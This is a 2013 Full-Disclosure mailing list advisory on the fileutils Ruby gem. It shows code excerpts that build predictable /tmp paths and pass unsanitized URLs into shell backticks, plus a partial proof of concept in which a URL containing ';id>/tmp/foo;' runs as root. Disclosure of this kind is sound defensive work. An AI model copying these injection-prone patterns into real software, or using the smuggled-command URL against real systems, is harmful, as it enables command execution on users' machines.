[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Fileutils ruby gem possible remote command execution and insecure file handling in /tmp
- To: full <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Fileutils ruby gem possible remote command execution and insecure file handling in /tmp
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Thu, 28 Feb 2013 14:01:16 +0000 (GMT)
<html><body><div>Fileutils ruby gem possible remote command execution and
insecure file handling in /tmp<br>2/23/2013<br><br>Hi list, I was looking at
some gem files and noticed a few issues with
fileutils-0.7<br><br>http://rubygems.org/gems/fileutils<br><br>"A set of
utility classes to extract meta data from different file types".<br><br>Handles
files insecurely in /tmp, a directory is created for that file extension say
'zip' and files are created/modified there. This directory can be hijacked and
the contents manipulated by a malicious user.<br><br>in
./lib/file_utils.rb<br><br> 15 def zip (target,
*sources)<br> 16 targetdir
=
"{FileUtils::Config.tmp_dir}/zip"<br> 17
id = 1<br> 18 while
File.exists?(targetdir)<br> 19
targetdir =
"{FileUtils::Config.tmp_dir}/zip#{id}"<br> 20
id += 1<br> 21
end<br> 22
FileUtils.mkdir(targetdir)<br><br>where Config.tmp_dir = /tmp<br><br>in
./lib/file_utils/config.rb<br><br>
5 def self.tmp_dir<br>
6
@tmp_dir ||= '/tmp'<br> 7
end<br><br>Remote command execution: <br><br>From file_utils.rb, doesn't
sanitize input on URLs passed to CutyCapt for execution. If a URL contains
shell characters say a ';' followed by a command a remote attacker execute a
command on the clients system if they are enticed to click an encoded url
like:<br><br> need to test URL encoding not sure if this is
valid. <br><br>http://bla.net.org;id>/tmp/o; ->
http://tinyurl.com/a5scxzz<br><br> 7 def capture
(url, target)<br> 8
command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) +
"/../bin/CutyCapt --min-width=1024 --min-height=768 --url={url}
--out={target}")<br> 9
`#{command}`<br> 10 end<br><br>partial PoC if
client is tricked into using malicious URL:<br><br>irb(main):001:0>
`xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt
--url=http://www.example.org;id>/tmp/foo; --out=/tmp/tempf` xvfb-run: error:
Xvfb failed to start<br>sh: 1: --out=/tmp/tempf: not found<br>=>
""<br>irb(main):002:0><br><br>root@ubuntu:~/CutyCapt/cutycapt/CutyCapt ls -l
/tmp/foo <br>-rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo
<br>root@ubuntu:~/CutyCapt/cutycapt/CutyCapt cat /tmp/foo <br>uid=0(root)
gid=0(root)
groups=0(root)<br>root@ubuntu:~/CutyCapt/cutycapt/CutyCapt#<br><br>Michael
Scherer of Redhat.com found other issues during a discussion about the above
issues I found:<br><br>In fact, there is the same similar problem in another
file :<br>result = `#{FileUtils::Config::OpenOffice.python} #{command}
#{source} #{target} #{FileUtils::Config::OpenOffice.port}`<br><br>I quickly
checked using irb ( a quick command line to type ruby snippet, and yes, using
funky chars result in funky results.<br><br>There is another issue in<br>#
Generates a temp filepath for the given extension def temp
(extension)<br><br>path = "{FileUtils::Config.tmp_dir}/tmp.{extension}" id =
1<br>while File.exists?(path)<br><br>
path =
"{FileUtils::Config.tmp_dir}/tmp.{id}.#{extension}"<br>
id += 1<br><br>end<br><br>Since someone could just create the file at the last
moment, and make a link so the script would overwrite an arbitrary
file.<br><br>Thanks to vl4dz and Michael.<br><br>Larry W. Cashdollar
@_larry0<br>http://vapid.dhs.org <br data-mce-bogus="1"></div></body></html>_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/